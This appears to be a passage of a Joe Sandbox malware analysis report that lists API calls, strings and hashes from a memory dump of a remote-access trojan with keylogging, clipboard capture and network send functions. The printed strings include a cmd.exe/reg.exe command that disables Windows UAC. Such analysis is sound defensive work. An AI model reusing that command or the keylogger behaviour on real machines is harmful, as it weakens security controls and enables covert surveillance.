                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 221034970-0
                                                                                                                                                                                                                                            • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                                                                                                                                                                                            • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Enum$InfoQueryValue
                                                                                                                                                                                                                                            • String ID: [regsplt]$DG
                                                                                                                                                                                                                                            • API String ID: 3554306468-1089238109
                                                                                                                                                                                                                                            • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                                                                                                                                                            • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID: wKE
                                                                                                                                                                                                                                            • API String ID: 269201875-3150218262
                                                                                                                                                                                                                                            • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                                                                                                                                                            • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                                                                                                                                                                                                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                                                                                                                                                                                                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                                                                                                                                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                                                                                                                                                                                                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                                                                                                                                            • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                                                                                                                                                                                                                                            • API String ID: 2974294136-4018440003
                                                                                                                                                                                                                                            • Opcode ID: 52feb45232d087000ab9dea4a82bd1c10224021308ca399c26d5e29f8a04d7c0
                                                                                                                                                                                                                                            • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52feb45232d087000ab9dea4a82bd1c10224021308ca399c26d5e29f8a04d7c0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: EventLocalTimewsprintf
                                                                                                                                                                                                                                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                                                                                            • API String ID: 1497725170-248792730
                                                                                                                                                                                                                                            • Opcode ID: abe9d9f547bce7274006dd8b845fb0ff0597043dd99dd38add9522b7adedb076
                                                                                                                                                                                                                                            • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abe9d9f547bce7274006dd8b845fb0ff0597043dd99dd38add9522b7adedb076
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                                                                            • String ID: `AG
                                                                                                                                                                                                                                            • API String ID: 1958988193-3058481221
                                                                                                                                                                                                                                            • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                                                                                                                                                                                            • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                                                                                                                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                                                                                            • String ID: 0$MsgWindowClass
                                                                                                                                                                                                                                            • API String ID: 2877667751-2410386613
                                                                                                                                                                                                                                            • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                                                                                                                                            • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                                                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            • API String ID: 2922976086-4183131282
                                                                                                                                                                                                                                            • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                                                                            • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 00442609
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 0044263F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B90,0040483F,00000001,?,?,00000000,00475B90,004017F3), ref: 00404AED
• SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404AF9
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 00404B04
• CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404B0D
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
APIs
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
• PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
• Sleep.KERNEL32(00002710), ref: 00419F89
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
• GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
• SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
• GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
• HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
• SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
• String ID:
• API String ID: 3525466593-0
APIs
  • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
• CloseHandle.KERNEL32(00000000), ref: 0040E8AB
  • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• String ID:
• API String ID: 4269425633-0
                                                                                                                                                                                                                                            • Opcode ID: 122ce0d90df0b48e24d728a99b2962e5ce1622f1701a582d9c233ec2db2507e3
                                                                                                                                                                                                                                            • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 122ce0d90df0b48e24d728a99b2962e5ce1622f1701a582d9c233ec2db2507e3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
APIs
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
• Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
• Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
• Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63), ref: 0044FF30
• __alloca_probe_16.LIBCMT ref: 0044FF68
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?), ref: 0044FFB9
• GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?,00000002,?), ref: 0044FFCB
• __freea.LIBCMT ref: 0044FFD4
  • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
• String ID:
• API String ID: 1857427562-0
• Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
• Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
• Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
• Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044E154
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
  • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
• _free.LIBCMT ref: 0044E1B0
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
• String ID:
• API String ID: 2278895681-0
• Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
• Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
• Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
• Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
APIs
• _free.LIBCMT ref: 0044F7C5
  • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
  • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
• _free.LIBCMT ref: 0044F7D7
• _free.LIBCMT ref: 0044F7E9
• _free.LIBCMT ref: 0044F7FB
• _free.LIBCMT ref: 0044F80D
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
• Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
• Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
• Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
APIs
• _free.LIBCMT ref: 00443315
  • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
  • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
• _free.LIBCMT ref: 00443327
• _free.LIBCMT ref: 0044333A
• _free.LIBCMT ref: 0044334B
• _free.LIBCMT ref: 0044335C
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
• Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
• Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
• Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
APIs
• GetWindowThreadProcessId.USER32(?,?), ref: 00416768
• GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
• IsWindowVisible.USER32(?), ref: 004167A1
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                                                                                                                                            • String ID: (FG
                                                                                                                                                                                                                                            • API String ID: 3142014140-2273637114
                                                                                                                                                                                                                                            • Opcode ID: 2df5b7247e134e06dd7043dd5c8eaa1a5c685bf3cd12a85f085cecee1c099086
                                                                                                                                                                                                                                            • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2df5b7247e134e06dd7043dd5c8eaa1a5c685bf3cd12a85f085cecee1c099086
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                                                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                                                                                                                                              • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
